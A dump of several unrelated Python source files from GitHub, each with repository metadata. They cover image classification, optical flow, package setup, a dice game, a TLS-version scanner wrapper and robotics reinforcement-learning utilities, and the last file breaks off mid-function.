import cv2 import numpy as np import logging from skimage import io import time from multiprocessing import Lock mutex = Lock() class AClassify: def __init__(self,uuid,net,image,s_client): logging.debug("intialisation is requested") self.url = s_client.generate_presigned_url(ClientMethod='get_object',Params={'Bucket':'data.ibeyonde','Key':image}) self.image = io.imread(self.url) self.preds = None self.blob = cv2.dnn.blobFromImage(self.image, 1, (224, 224), (104, 117, 123)) self.net = net self.idxs = None self.new_label = [] self.uuid = uuid def compute(self,classes): logging.debug("Aclassify computation is requested") global mutex mutex.acquire() logging.info("lock acquired by thread") self.net.setInput(self.blob) start = time.time() self.preds = self.net.forward() end = time.time() logging.info("[INFO] analytics took {:.5} seconds".format(end - start)) self.idxs = np.argsort(self.preds[0])[::-1][:5] logging.info(self.idxs) for idx in self.idxs: label = classes[idx] if label.endswith('\r'): label = label[:-1] self.new_label.append({label:self.preds[0][idx]}) mutex.release() logging.info("lock relased by thread") return self.uuid,self.new_label
gitibeyonde/pyms
lib/AnalyticsClassify.py
AnalyticsClassify.py
py
1,480
python
en
code
0
github-code
36
6999547749
# Functions to calculate optical flow import opyf import utils def analyze_frames(element): dir = "/media/madziegielewska/Seagate Expansion Drive/Diploma-Project/" analyzer = opyf.frameSequenceAnalyzer(f"{dir}Demo-App/static/segmentation_results/{element}") num = analyzer.number_of_frames utils.delete_files_in_directory(f"{dir}Demo-App/static/opyflow_results/{element}") analyzer.writeGoodFeaturesPositionsAndDisplacements(fileFormat='csv', outFolder=f"{dir}Demo-App/static/opyflow_results/{element}") analyzer.extractGoodFeaturesPositionsDisplacementsAndInterpolate() analyzer.writeVelocityField(fileFormat='csv', outFolder=f"{dir}Demo-App/static/opyflow_results/{element}") analyzer.set_vecTime(Ntot=num-1,shift=1,step=1) analyzer.extractGoodFeaturesAndDisplacements(display='quiver', displayColor=True, saveImgPath=f"{dir}/Demo-App/static/opyflow_results/{element}", width=0.005) utils.convert_frames_to_video(f'{element}.mp4', element, 10)
mdziegielewska/Diploma-Project
Demo-App/opticalflow.py
opticalflow.py
py
994
python
en
code
0
github-code
36
16912146541
""" Setup Module for Blob Creator Author: Michael Kohlegger Date: 2021-09 """ import setuptools with open("README.md", "r", encoding="utf8") as readme_file: readme = readme_file.read() with open('requirements.txt', "r", encoding="utf8") as requirement_file: requirements = requirement_file.read().splitlines() setuptools.setup( name='blob_creator', version='3.2.5', author="Michael Kohlegger", author_email="michael@datenberge.org", description="Package to create dummy datasets for analysis tasks", long_description=readme, long_description_content_type="text/markdown", url = "https://github.com/mckoh/blob_creator", project_urls={ "Bug Tracker": "https://github.com/mckoh/blob_creator/issues", }, classifiers=[ "Programming Language :: Python :: 3", "License :: OSI Approved :: MIT License", "Operating System :: OS Independent", ], package_dir={"": "src"}, packages=setuptools.find_packages(where="src"), python_requires=">=3.6", install_requires=requirements )
mckoh/blob_creator
setup.py
setup.py
py
1,076
python
en
code
1
github-code
36
3511755621
import random print("Infinity Dice") def infinityDice(): running = True while running: sides = int(input("How many sides do you want?: ")) roll = random.randint(1,sides) print(f"You rolled {roll}") if input("Do you want to roll again? (y/n):") == "n": exit() infinityDice()
tanapolark/100_days_coding_python
day_24_def_2.py
day_24_def_2.py
py
303
python
en
code
0
github-code
36
20766513047
import sslscan from sslscan import modules from sslscan.module.scan import BaseScan class SSLScanScanner: def __init__(self, target): self.target = target self.scanner = sslscan.Scanner() def scan(self): self.scanner.scan(self.target) for server in self.scanner.get_results(): for ssl_version in server.accepted_ssl_versions: print("Accepted: %s" % ssl_version) for ssl_version in server.rejected_ssl_versions: print("Rejected: %s" % ssl_version) for ssl_version in server.failed_ssl_versions: print("Failed: %s" % ssl_version)
shadowaxe99/MORE-AGENTS
cybersecurity_scanner/sslscan_scanner/sslscan_scanner.py
sslscan_scanner.py
py
655
python
en
code
0
github-code
36
34353630412
import dash_pivottable import dash_html_components as html def make_pivot_table(df): columns_in_table=["CLIMA_AMBIENTAL", "PAISAJE", "CODIGO", 'TIPO_RELIEVE', 'FORMA_TERRENO', 'MATERIAL_PARENTAL_LITOLOGIA', 'ORDEN',] new_df=df[columns_in_table].dropna() Data_to_use = [list(new_df)] + new_df.to_numpy().tolist() layout_pivot_table = html.Div( dash_pivottable.PivotTable( data=Data_to_use, cols=[], rows=["CLIMA_AMBIENTAL", "PAISAJE", 'TIPO_RELIEVE', 'FORMA_TERRENO', 'MATERIAL_PARENTAL_LITOLOGIA', 'ORDEN'], vals=["CODIGO"], ), style={'height': '700px','width': '99%', 'overflow': 'scroll', 'resize': 'both','align':'center'}, ) return layout_pivot_table
DS4A-Team19-2021/Agustin-Codazzi-Project
apps/utils/utils_pivot_table.py
utils_pivot_table.py
py
782
python
en
code
1
github-code
36
28037620802
from setuptools import find_packages, setup # read the contents of README file from os import path from io import open # for Python 2 and 3 compatibility # get __version__ from _version.py ver_file = path.join('tensorpi', 'version.py') with open(ver_file) as f: exec(f.read()) this_directory = path.abspath(path.dirname(__file__)) # read the contents of README.rst def readme(): with open(path.join(this_directory, 'README.md'), encoding='utf-8') as f: return f.read() # read the contents of requirements.txt with open(path.join(this_directory, 'requirements.txt'), encoding='utf-8') as f: requirements = f.read().splitlines() setup( name='tensorpi', version=__version__, description='Python library for low-rank tensor learning', long_description=readme(), long_description_content_type='text/x-rst', author='Xinyu Chen', author_email='chenxy346@gmail.com', url='https://github.com/xinychen/tensorpi', download_url='https://github.com/xinychen/tensorpi/archive/master.zip', keywords=['tensor learning', 'tensor computation', 'matrix completion', 'tensor completion'], packages=find_packages(exclude=['test']), include_package_data=True, install_requires=requirements, setup_requires=['setuptools>=38.6.0'], classifiers=[ 'Development Status :: 5 - Production/Stable', 'Intended Audience :: Education', 'Intended Audience :: Financial and Insurance Industry', 'Intended Audience :: Science/Research', 'Intended Audience :: Developers', 'Intended Audience :: Information Technology', 'License :: OSI Approved :: BSD License', 'Programming Language :: Python :: 3.6', 'Programming Language :: Python :: 3.7', ], )
xinychen/TensorPi
setup.py
setup.py
py
1,800
python
en
code
3
github-code
36
24011968546
# -------------------------------------------------------- # Licensed under The MIT License [see LICENSE for details] # -------------------------------------------------------- import numpy as np import os import sys from transforms3d.quaternions import * from transforms3d.euler import * from transforms3d.axangles import * import random from tensorboardX import SummaryWriter from scipy.spatial import cKDTree import scipy.io as sio import IPython import time from torch import nn from torch import optim import torch import torch.nn.functional as F from torch.optim import Adam from collections import deque import tabulate import cv2 import matplotlib.pyplot as plt import yaml import core import copy import math from easydict import EasyDict as edict from pointnet2_ops.pointnet2_utils import furthest_point_sample, gather_operation import colorsys import psutil import GPUtil from core.common_utils import * import pybullet as p HAS_PLANNER_INSTALLED = True try: from OMG.ycb_render.robotPose import robot_pykdl except: HAS_PLANNER_INSTALLED = False # global variables V = cam_V = [[-0.9351, 0.3518, 0.0428, 0.3037], [0.2065, 0.639, -0.741, 0.132], [-0.2881, -0.684, -0.6702, 1.8803], [0.0, 0.0, 0.0, 1.0]] hand_finger_point = np.array([ [ 0., 0., 0. , -0. , 0. , -0. ], [ 0., 0., 0.053, -0.053, 0.053, -0.053], [ 0., 0., 0.075, 0.075, 0.105, 0.105]]) anchor_seeds = np.array([ [0.0, -1.285, 0, -2.356, 0.0, 1.571, 0.785], [2.5, 0.23, -2.89, -1.69, 0.056, 1.46, -1.27], [2.8, 0.23, -2.89, -1.69, 0.056, 1.46, -1.27], [2, 0.23, -2.89, -1.69, 0.056, 1.46, -1.27], [2.5, 0.83, -2.89, -1.69, 0.056, 1.46, -1.27], [0.049, 1.22, -1.87, -0.67, 2.12, 0.99, -0.85], [-2.28, -0.43, 2.47, -1.35, 0.62, 2.28, -0.27], [-2.02, -1.29, 2.20, -0.83, 0.22, 1.18, 0.74], [-2.2, 0.03, -2.89, -1.69, 0.056, 1.46, -1.27], [-2.5, -0.71, -2.73, -0.82, -0.7, 0.62, -0.56], [-2, -0.71, -2.73, -0.82, -0.7, 0.62, -0.56], [-2.66, -0.55, 2.06, -1.77, 0.96, 1.77, -1.35], [1.51, -1.48, -1.12, -1.55, -1.57, 1.15, 0.24], [-2.61, -0.98, 2.26, -0.85, 0.61, 1.64, 0.23] ]) renderer = None robot = None robot_points = None panda = None panda_clients = [] def require_panda(num=1): global panda, panda_clients if panda is None: from env.panda_gripper_hand_camera import Panda import pybullet_utils.bullet_client as bc panda_clients = [bc.BulletClient(connection_mode=p.DIRECT) for i in range(num)] panda = [Panda(stepsize=1./ 1000., base_shift=[-0.05, 0.0, 10.], bullet_client=panda_clients[i]) for i in range(num)] # -0.65 return panda, panda_clients def require_robot(new=False): if new: return robot_pykdl.robot_kinematics(None, data_path='../../../') global robot if robot is None: robot = robot_pykdl.robot_kinematics(None, data_path='../../../') return robot def require_renderer(large_fov=False, offset=False ): global renderer, robot if renderer is None : from OMG.ycb_render.ycb_renderer import YCBRenderer width, height = 640, 480 renderer = YCBRenderer(width=width, height=height, offset=offset, gpu_id=0) if not large_fov: renderer.set_projection_matrix(width, height, width * 0.8, width * 0.8, width / 2, height / 2, 0.1, 6) renderer.set_camera_default() else: renderer.set_fov(90) models = ["link1", "link2", "link3", "link4", "link5", "link6", "link7", "hand", "finger", "finger"] obj_paths = ["data/robots/{}.DAE".format(item) for item in models] renderer.load_objects(obj_paths) robot = require_robot() return renderer, robot def truncated_normal(tensor, mean=0, std=1, trunc_std=2): size = tensor.shape tmp = tensor.new_empty(size + (8,)).normal_() # 4 valid = (tmp < trunc_std) & (tmp > -trunc_std) ind = valid.max(-1, keepdim=True)[1] tensor.data.copy_(tmp.gather(-1, ind).squeeze(-1)) tensor.data.mul_(std).add_(mean) return tensor def sample_gaussian(size, truncate_std=None, device=None): y = torch.randn(*size).float() y = y if device is None else y.to(device) if truncate_std is not None: truncated_normal(y, mean=0, std=1, trunc_std=truncate_std) return y def vis_network_input(xyz, xyz_features): for i in range(len(xyzs)): renderer, _ = require_renderer() vis_point(renderer, xyz_features[i], interact=2) def get_usage(): GPUs = GPUtil.getGPUs() memory_usage = psutil.virtual_memory().percent gpu_usage = max([GPU.memoryUsed for GPU in GPUs]) return gpu_usage, memory_usage def solve_ik(joints, pose): """ For simulating trajectory """ ik = robot.inverse_kinematics_trac_ik(pose[:3], ros_quat(pose[3:]), seed=joints[:7]) if ik is not None: joints = np.append(np.array(ik), [0, 0.04, 0.04]) return joints def bullet_ik(pandas, joints, poses, panda_clients): # simulate target_joints = [] for panda, joint, p_client, pose in zip(pandas, joints, panda_clients, poses): panda.reset(np.array(joint).flatten()) pos, orn = pose[:3], ros_quat(pose[3:]) target_joints.append(np.array(p_client.calculateInverseKinematics(panda.pandaUid, panda.pandaEndEffectorIndex, pos, orn))) return np.stack(target_joints, axis=0) def generate_simulated_learner_trajectory(point_state, joints, agent, remain_timestep, max_traj_num=1, vis=False, gaddpg=False): """ use the current point cloud and bullet kinemetics to simulate observation and action for a trajectory extract the stored plan in the dataset for plan encoding param: 4 x N, 9 """ MAX_CLIENT_NUM = max(agent.test_traj_num, 8) pandas, panda_clients = require_panda(MAX_CLIENT_NUM) num = len(point_state) if num > 1: init_joints = joints[0].flatten() total_step = int(remain_timestep[0]) else: init_joints = joints.flatten() total_step = remain_timestep pandas = pandas[:num] panda_clients = panda_clients[:num] ef_pose = [] for panda, p_client in zip(pandas, panda_clients): panda.reset(joints=init_joints.flatten()) pos, orn = p_client.getLinkState(panda.pandaUid, panda.pandaEndEffectorIndex)[:2] ef_pose.append(unpack_pose(list(pos) + [orn[3], orn[0], orn[1], orn[2]])) ef_pose = np.stack(ef_pose, axis=0) sim_point_state = point_state[0] if len(point_state.shape) == 3 and point_state.shape[0] == 1 else point_state sim_pose = np.stack([np.eye(4)] * num, axis=0) plan, sim_states, sim_joints, sim_actions, sim_poses = [], [], [], [], [sim_pose] agent.train_traj_feature = False # avoid regenerating traj latent # rollout step_func = agent.batch_select_action if num > 1 else agent.select_action if has_check(agent, 'vis_traj') and hasattr(agent, 'gaddpg') and gaddpg: step_func = agent.gaddpg_step # for episode_steps in range(total_step): state = [[sim_point_state, np.zeros(1)], None, None, None] action, _, _, aux_pred = step_func(state, remain_timestep=remain_timestep - episode_steps, curr_joint=joints ) if len(action.shape) == 1: action = action[None] action_pose = unpack_action_batch(action) ef_pose = np.matmul(ef_pose, action_pose) # joints joints = bullet_ik(pandas, joints, pack_pose_batch(ef_pose), panda_clients) sim_point_state = se3_transform_pc(se3_inverse_batch(action_pose), sim_point_state) plan.append(joints) sim_actions.append(action) sim_states.append(sim_point_state) sim_poses.append(np.matmul(sim_poses[-1], action_pose)) sim_joints.append(joints) sim_poses = list(pack_pose_rot_first_batch(np.concatenate(sim_poses, axis=0)).reshape(-1, num, 7).transpose((1,0,2))) agent.train_traj_feature = True sim_integer_time = np.arange(total_step, 0, -1) traj_time_batch = sim_integer_time[::-1] / float(total_step) return sim_poses, traj_time_batch, sim_joints, sim_states, sim_integer_time def generate_simulated_expert_trajectory(state, plan, curr_joint, curr_traj_time=0, idx=0, vis=False,robot=None): """ use the current point cloud to simulate observation and action for a trajectory extract the stored plan in the dataset for plan encoding param: 4 x N, T x 9, 9 """ arm_collision_point = get_collision_points() if robot is None: robot = require_robot() curr_ef_pose = (robot.forward_kinematics_parallel(wrap_value(curr_joint)[None], offset=False)[0][7]) global_pc = np.matmul(curr_ef_pose[:3, :3], state[:3, :-500]) + curr_ef_pose[:3, [3]] pc_mask = state[[3]] max_len = len(plan) traj_len = plan_length(plan) plan = plan[:traj_len] if traj_len == 0: return (state[None], plan, np.zeros(6)[None], pack_pose_rot_first(np.eye(4))[None], pack_pose_rot_first(np.eye(4))[None], [1.], [[idx, 0, curr_traj_time]]) plan_link_poses = robot.forward_kinematics_parallel(wrap_values(plan), offset=False) sim_poses = pack_pose_rot_first_batch(np.matmul(se3_inverse(curr_ef_pose)[None], plan_link_poses[:, 7])) sim_goals = pack_pose_rot_first_batch(np.matmul(se3_inverse_batch(\ np.concatenate((curr_ef_pose[None], plan_link_poses[:, 7]), axis=0)), plan_link_poses[-1, 7][None])) # not used inv_ef_pose = se3_inverse_batch(plan_link_poses[:, 7]) sim_states = np.matmul(inv_ef_pose[:, :3, :3], global_pc[None]) + inv_ef_pose[:, :3, [3]] plan_link_poses = np.matmul(inv_ef_pose[:, None], plan_link_poses) collision_point = np.matmul(plan_link_poses[...,:3,:3], arm_collision_point.swapaxes(-1, -2)[:,:3]).swapaxes(-1, -2) + \ plan_link_poses[...,:3,[3]].swapaxes(-1, -2) collision_point = collision_point.reshape([len(plan_link_poses), -1, 3]).swapaxes(-1, -2) sim_states = np.concatenate((sim_states, collision_point), axis=-1) # robot points sim_states = np.concatenate((sim_states, np.tile(pc_mask[None], (len(sim_states), 1, 1))), axis=1) # mask sim_joints = np.concatenate((curr_joint[None], plan), axis=0) sim_actions = np.zeros([len(sim_joints) - 1, 6]) # not used sim_traj_idx = [[idx, j / float(traj_len), curr_traj_time + (j + 1) / max_len] for j in range(traj_len + 1)] sim_states = np.concatenate((state[None], sim_states),axis=0) # plan = np.concatenate((curr_joint[None], plan),axis=0) # sim_poses = np.concatenate((pack_pose_rot_first(np.eye(4))[None], sim_poses),axis=0) sim_actions = np.concatenate((sim_actions, np.zeros(6)[None]),axis=0) sim_integer_time = np.arange(traj_len + 1, 0, -1) return (sim_states, plan, sim_actions, sim_poses, sim_goals, sim_integer_time, sim_traj_idx) def vis_learner_traj(state, joints, agent, remain_timestep): """ visualize rollout using the current traj_feat """ remain_timestep = min(remain_timestep, 45) point_state = state[0][0][None] poses = robot.forward_kinematics_parallel(wrap_value(joints)[None], offset=False)[0] ef_pose = poses[7] packed_poses = [pack_pose(pose) for pose in poses] sampler_multi_traj = len(agent.traj_feat_target_test) > 1 # make copy traj_feat_copy = agent.traj_feat.clone() agent.traj_feat = agent.traj_feat_target_test # restore sampler latent max_traj_num = 1 if sampler_multi_traj: max_traj_num = agent.test_traj_num joints = np.tile(joints, (max_traj_num, 1)) point_state = np.tile(point_state, (max_traj_num, 1, 1)) remain_timestep = torch.ones(max_traj_num).cuda() * remain_timestep vis_traj = generate_simulated_learner_trajectory(point_state, joints, agent, remain_timestep, max_traj_num)[0] traj_lines = [] hues = np.linspace(0., 5./6, max_traj_num ) colors = np.stack([colorsys.hsv_to_rgb(hue, 1.0, 1.0) for hue in hues]) * 255 lines_color = (np.repeat(colors, 2, axis=0).astype(np.int)).tolist() for i in range(max_traj_num): traj_lines.extend(gripper_traj_lines(ef_pose, vis_traj[i])) lines = traj_lines else: vis_traj = generate_simulated_learner_trajectory(point_state, joints, agent, remain_timestep, max_traj_num)[0] traj_line, grasp_line = gripper_traj_lines(ef_pose, vis_traj[0]) lines = [(traj_line[0], traj_line[1]), (grasp_line[0], grasp_line[1])] lines_color = [[0, 0, 255], [0, 0, 255]] vis_point_state = state[0][0] vis_point_state = vis_point_state[:, 6:] # avoid hand point collision target_mask = get_target_mask(vis_point_state) point_color = get_point_color(vis_point_state) vis_point_state = se3_transform_pc(ef_pose, vis_point_state) # base coordinate renderer = require_renderer()[0] renderer.vis(packed_poses, range(len(poses)), shifted_pose=np.eye(4), interact=2, V=np.array(V), visualize_context={ "white_bg": True, "project_point": [vis_point_state[:3]], "project_color": [point_color], "point_size": [3], "reset_line_point": True, "static_buffer": True, "line": lines, "line_color": lines_color, } ) agent.traj_feat = traj_feat_copy def joint_to_cartesian(new_joints, curr_joint): """ Convert joint space action to task space action by fk """ r = require_robot() ef_pose = r.forward_kinematics_parallel(wrap_value(curr_joint)[None], offset=False)[0][-3] ef_pose_ = r.forward_kinematics_parallel(wrap_value(new_joints)[None], offset=False)[0][-3] rel_pose = se3_inverse(ef_pose).dot(ef_pose_) action = np.hstack([rel_pose[:3,3], mat2euler(rel_pose[:3,:3])]) return action def check_ngc(): """ check for using cluster in training """ GPUs = GPUtil.getGPUs() gpu_limit = max([GPU.memoryTotal for GPU in GPUs]) return (gpu_limit > 14000) def plan_length(plan): if len(plan) == 0: return plan if type(plan) is np.ndarray: return np.sum(np.abs(plan).sum(-1) > 0) else: return torch.sum(torch.abs(plan).sum(-1) > 0) def pad_traj_plan(plan, max_len=50): padded_plan = np.zeros((max_len, 9)) if len(plan) == 0: return padded_plan padded_plan[:len(plan)] = plan return padded_plan def update_net_args(config, spec, net_args): net_args["model_scale"] = config.feature_input_dim / 512. net_args["group_norm"] = True if has_check(config, 'sa_channel_concat'): spec["net_kwargs"]["action_concat"] = True if has_check(config, 'joint_point_state_input'): net_args["extra_latent"] += 7 if has_check(config, 'feature_option'): net_args["feature_option"] = config.feature_option if has_check(config, 'value_overwrite_lr') and config.value_overwrite_lr > 0: spec["opt_kwargs"]["lr"] = config.value_overwrite_lr def update_traj_net_args(config, spec, net_args): net_args["feature_extractor_class"] = config.traj_feature_extractor_class net_args["num_inputs"] = config.traj_latent_size net_args["hidden_dim"] = config.feature_input_dim net_args["feat_head_dim"] = config.traj_latent_size net_args["config"] = config net_args["model_scale"] = config.traj_latent_size / 512. net_args["feature_option"] = config.st_feature_option net_args["group_norm"] = True spec["opt_kwargs"]["lr"] = config.traj_net_lr net_args["extra_latent"] += 7 def update_traj_sampler_net_args(config, spec, net_args): net_args["num_inputs"] = config.traj_latent_size net_args["hidden_dim"] = config.feature_input_dim net_args["feat_head_dim"] = config.traj_latent_size net_args["config"] = config net_args["output_model_scale"] = config.traj_latent_size / 512. net_args["model_scale"] = config.traj_sampler_latent_size / 512. net_args["feature_option"] = config.traj_feature_option net_args["group_norm"] = True net_args["extra_latent"] += 7 # joint spec["opt_kwargs"]["lr"] = config.traj_sampler_net_lr if config.sampler_extra_abs_time: net_args["extra_latent"] += 1 # time def make_nets_opts_schedulers(model_spec, config, cuda_device="cuda"): specs = yaml.load(open(model_spec).read(), Loader=yaml.SafeLoader) # ret = {} if torch.cuda.device_count() > 1: print("Let's use", torch.cuda.device_count(), "GPUs!") for net_name, spec in specs.items(): net_args = spec.get("net_kwargs", {}) if net_name == "state_feature_extractor": if has_check(config, 'state_feature_extractor'): spec["class"] = config.state_feature_extractor net_args["input_dim"] = config.channel_num update_net_args(config, spec, net_args) if net_name == 'traj_feature_extractor': if has_check(config, 'train_traj_feature'): net_args["input_dim"] = config.channel_num update_traj_net_args(config, spec, net_args) else: continue if net_name == 'traj_feature_sampler': if has_check(config, 'train_traj_sampler') : net_args["input_dim"] = config.channel_num update_traj_sampler_net_args(config, spec, net_args) else: continue print('net_name:', net_name) net_class = getattr(core.networks, spec["class"]) net = net_class(**net_args) net = torch.nn.DataParallel(net).to("cuda") d = { "net": net, } if "opt" in spec: d["opt"] = getattr(optim, spec["opt"])( net.parameters(), **spec["opt_kwargs"] ) if len(config.overwrite_feat_milestone) > 0: spec["scheduler_kwargs"]["milestones"] = config.overwrite_feat_milestone print("schedule:", spec["scheduler_kwargs"]["milestones"]) d["scheduler"] = getattr(optim.lr_scheduler, spec["scheduler"])( d["opt"], **spec["scheduler_kwargs"] ) if hasattr(net.module, "encoder"): d["encoder_opt"] = getattr(optim, spec["opt"])( net.module.encoder.parameters(), **spec["opt_kwargs"] ) d["encoder_scheduler"] = getattr(optim.lr_scheduler, spec["scheduler"])( d["encoder_opt"], **spec["scheduler_kwargs"] ) if hasattr(net.module, "value_encoder"): d["val_encoder_opt"] = getattr(optim, spec["opt"])( net.module.value_encoder.parameters(), **spec["opt_kwargs"] ) d["val_encoder_scheduler"] = getattr( optim.lr_scheduler, spec["scheduler"] )(d["val_encoder_opt"], **spec["scheduler_kwargs"]) ret[net_name] = d return ret def get_fc_feat_head(input_dim, dim_list, output_dim, acti_func='nn.ReLU', end_with_act=False): model_list = [nn.Linear(input_dim, dim_list[0]), nn.ReLU(True)] for i in range(1, len(dim_list)): model_list.extend([nn.Linear(dim_list[i-1], dim_list[i]), eval(acti_func)(True)]) model_list.append(nn.Linear(dim_list[-1], output_dim)) if end_with_act: model_list.append(eval(acti_func)(True)) return nn.Sequential(*model_list) def get_info(state, opt="img", IMG_SIZE=(112, 112)): if opt == "img": return (state[0][1][:3].T * 255).astype(np.uint8) if opt == "intr": cam_proj = np.array(state[-2][48:]).reshape([4, 4]) return projection_to_intrinsics(cam_proj, IMG_SIZE[0], IMG_SIZE[1])[:3, :3] if opt == "point": return state[0][0] def get_collision_points(): """ load collision points with the order of the link list and end effector """ global robot_points if robot_points is None: collision_file = 'data/robots/all_collision_pts.npy' if not os.path.exists(collision_file): collision_pts = [] links = [ "link1", "link2", "link3", "link4", "link5", "link6", "link7", "hand", "finger", "finger", ] for i in range(len(links)): file = "data/robots/{}.xyz".format(links[i]) pts = np.loadtxt(file) sample_pts = pts[random.sample(range(pts.shape[0]), 50)] collision_pts.append(sample_pts) collision_pts = np.array(collision_pts) np.save(collision_file, collision_pts) else: collision_pts = np.load(collision_file) robot_points = collision_pts return robot_points def sample_latent(batch_size, latent_size): return torch.randn(batch_size, latent_size).cuda() def add_extra_text(img, extra_text, text_size=0.3, corner='tl'): img = img.copy() img_ratio = img.shape[0] / 256 gap = int(15 * img_ratio) width, height = img.shape[:2] offset_h = 0 if corner.startswith('t') else height - int(50 * img_ratio) offset_w = 0 if corner.endswith('l') else int(width - 30 * img_ratio) sign = 1 if corner.startswith('t') else -1 text_size = 0.3 * img_ratio for i, t in enumerate(extra_text): # cv2.putText( img, t, (offset_w, offset_h + sign * (gap + i * gap)), cv2.FONT_HERSHEY_DUPLEX, text_size, [255,0,0] ) # 0.7 return img def write_video( traj, scene_file, overhead_traj=None, expert_traj=None, overhead_expert_traj=None, name=0, IMG_SIZE=(112, 112), output_dir="output_misc/", logdir="policy", target_name="", surfix="", use_pred_grasp=False, success=False, use_value=False, extra_text=None ): ratio = 1 if expert_traj is None else 2 result = "success" if success else "failure" video_writer = make_video_writer( os.path.join( output_dir, "rl_output_video_{}/{}_rollout.avi".format(surfix, scene_file), ), int(ratio * IMG_SIZE[0]), int(IMG_SIZE[1]), ) text_color = [255, 0, 0] if use_pred_grasp else [0, 255, 0] for i in range(len(traj)): img = traj[i][..., [2, 1, 0]] if expert_traj is not None: idx = min(len(expert_traj) - 1, i) img = np.concatenate((img, expert_traj[idx][..., [2, 1, 0]]), axis=1) img = img.astype(np.uint8) if extra_text is not None: img = add_extra_text(img, extra_text) video_writer.write(img) if overhead_traj is not None: width, height = overhead_traj[0].shape[1], overhead_traj[0].shape[0] overhead_video_writer = make_video_writer( os.path.join( output_dir, "rl_output_video_{}/{}_overhead_rollout.avi".format(surfix, scene_file)), int(ratio * width), height ) for i in range(len(overhead_traj)): img = overhead_traj[i][..., [2, 1, 0]] if overhead_expert_traj is not None: idx = min(len(overhead_expert_traj) - 1, i) img = np.concatenate((img, overhead_expert_traj[idx][..., [2, 1, 0]]), axis=1) overhead_video_writer.write(img.astype(np.uint8)) def append_pointcloud_time(agent, point_state, time_batch=None, traj=True, train=True): if not train: if not hasattr(agent, 'timestep'): traj_integer_time_batch = torch.Tensor([0]).float().cuda() else: traj_integer_time_batch = agent.timestep else: traj_integer_time_batch = time_batch if agent.sampler_extra_abs_time: traj_time_batch = traj_integer_time_batch.view(-1,1,1).expand(-1, -1, point_state.shape[2]) point_state = torch.cat((point_state, traj_time_batch), dim=1) return point_state def preprocess_points(config, state_input, curr_joint, time_batch=None, traj=False, append_pc_time=False): """ process point cloud for network input """ if type(curr_joint) is not torch.Tensor: curr_joint = torch.from_numpy(curr_joint).cuda().float() if type(state_input) is not torch.Tensor: state_input = torch.from_numpy(state_input).cuda().float() state_input_batch = state_input.clone() curr_joint = curr_joint[:, :7] if state_input_batch.shape[-1] > 4500: # robot point included state_input_batch = remove_robot_pt(state_input_batch) if (not traj and has_check(config, 'joint_point_state_input')) or \ (traj and has_check(config, 'traj_joint_point_state_input')): curr_joint_bc = curr_joint[...,None].expand(-1, -1, state_input_batch.shape[-1]) state_input_batch = torch.cat((state_input_batch, curr_joint_bc), dim=1) if append_pc_time and hasattr(config, 'test_mode'): state_input_batch = append_pointcloud_time(config, state_input_batch, time_batch, False, not config.test_mode) return state_input_batch def get_point_color(vis_points): tgt_mask = get_target_mask(vis_points) obs_mask = get_obs_mask(vis_points) near_obs_mask = get_near_obs_mask(vis_points) rob_mask = get_robot_mask(vis_points) target_color = [0, 255, 0] obs_color = [255, 0, 0] rob_color = [0, 0, 255] near_obs_color = [255, 0, 0] pt_color = np.zeros_like(vis_points[:3]).T pt_color[tgt_mask] = target_color pt_color[obs_mask] = obs_color pt_color[rob_mask] = rob_color pt_color[near_obs_mask] = near_obs_color return pt_color def sample_ef(target, near=0.2, far=0.50): # sample a camera extrinsics count = 0 ik = None outer_loop_num = 20 inner_loop_num = 5 robot = require_robot() for _ in range(outer_loop_num): theta = np.random.uniform(low=0, high=1*np.pi/2) phi = np.random.uniform(low=np.pi/2, high=3*np.pi/2) # half sphere r = np.random.uniform(low=near, high=far) # sphere radius pos = np.array([r*np.sin(theta)*np.cos(phi), r*np.sin(theta)*np.sin(phi), r*np.cos(theta)]) trans = pos + target + np.random.uniform(-0.03, 0.03, 3) trans[2] = np.clip(trans[2], 0.2, 0.6) trans[1] = np.clip(trans[1], -0.3, 0.3) trans[0] = np.clip(trans[0], 0.0, 0.5) pos = trans - target for i in range(inner_loop_num): rand_up = np.array([0, 0, -1]) rand_up = rand_up / np.linalg.norm(rand_up) R = inv_lookat(pos, 2 * pos, rand_up).dot(rotZ(-np.pi/2)[:3, :3]) quat = ros_quat(mat2quat(R)) ik = robot.inverse_kinematics(trans, quat, seed=anchor_seeds[np.random.randint(len(anchor_seeds))]) if ik is not None: break return ik def gripper_traj_lines(start_pose, traj_state, joint_output=False, gripper_along=False ): ef_lines = [] gripper_lines = [np.zeros([3, 0]), np.zeros([3, 0])] draw_gripper_traj_line = gripper_along if joint_output: r = require_robot() curr_joint = np.concatenate((traj_state, 0.04 * np.ones((len(traj_state), 2))), axis=-1) traj_state = r.forward_kinematics_parallel(wrap_values(curr_joint ), offset=False)[:, 7] for grasp_idx, grasp in enumerate(traj_state): if not joint_output: if grasp_idx == 0: grasp = np.eye(4) elif len(grasp) == 6: grasp = unpack_pose_euler(grasp) else: grasp = unpack_pose_rot_first(grasp) grasp_pose = start_pose.dot(grasp) line_starts, line_ends = grasp_gripper_lines(grasp_pose[None]) gripper_lines[0] = np.concatenate((gripper_lines[0], line_starts[0]), axis=-1) gripper_lines[1] = np.concatenate((gripper_lines[1], line_ends[0]), axis=-1) ef_lines.append(grasp_pose[:3, 3]) if not draw_gripper_traj_line: gripper_lines[0] = gripper_lines[0][:,-5:] gripper_lines[1] = gripper_lines[1][:,-5:] if len(ef_lines) > 1: ef_lines = [[ef_lines[idx], ef_lines[idx+1]] for idx in range(len(ef_lines) - 1)] ef_lines = np.array(ef_lines) ef_lines = [ef_lines.T[:, 0], ef_lines.T[:, 1]] else: ef_lines = [] return [gripper_lines, ef_lines] def vis_traj(point, curr_joint, traj_state=None, V=cam_V, interact=2, used_renderer=None, gripper_along=False): # visualize traj with renderer renderer, robot = require_renderer( ) if type(point) is torch.Tensor: point = point.detach().cpu().numpy() point = point[0] if point.shape(1) != 4096: point = point[:,6:-500] # remove gripper and robot point if type(curr_joint) is torch.Tensor: curr_joint = curr_joint.detach().cpu().numpy() if len(curr_joint) == 7: curr_joint = np.append(curr_joint, [0, 0]) poses_ = robot.forward_kinematics_parallel(wrap_value(curr_joint), offset=False)[0] poses_2 = [pack_pose(pose) for pose in poses_] point_color = get_point_color(point) point = se3_transform_pc(poses_[7], point) if traj_state is not None: if type(traj_state) is torch.Tensor: traj_state = traj_state.detach().cpu().numpy() if type(traj_state) is list and len(traj_state) > 4: traj_lines = [] line_colors = get_mask_colors(len(traj_state) * 2 + 5)[5:] for i in range(len(traj_state)): traj_lines.extend(gripper_traj_lines(poses_[7], traj_state[i])) else: gripper_lines, ef_lines = 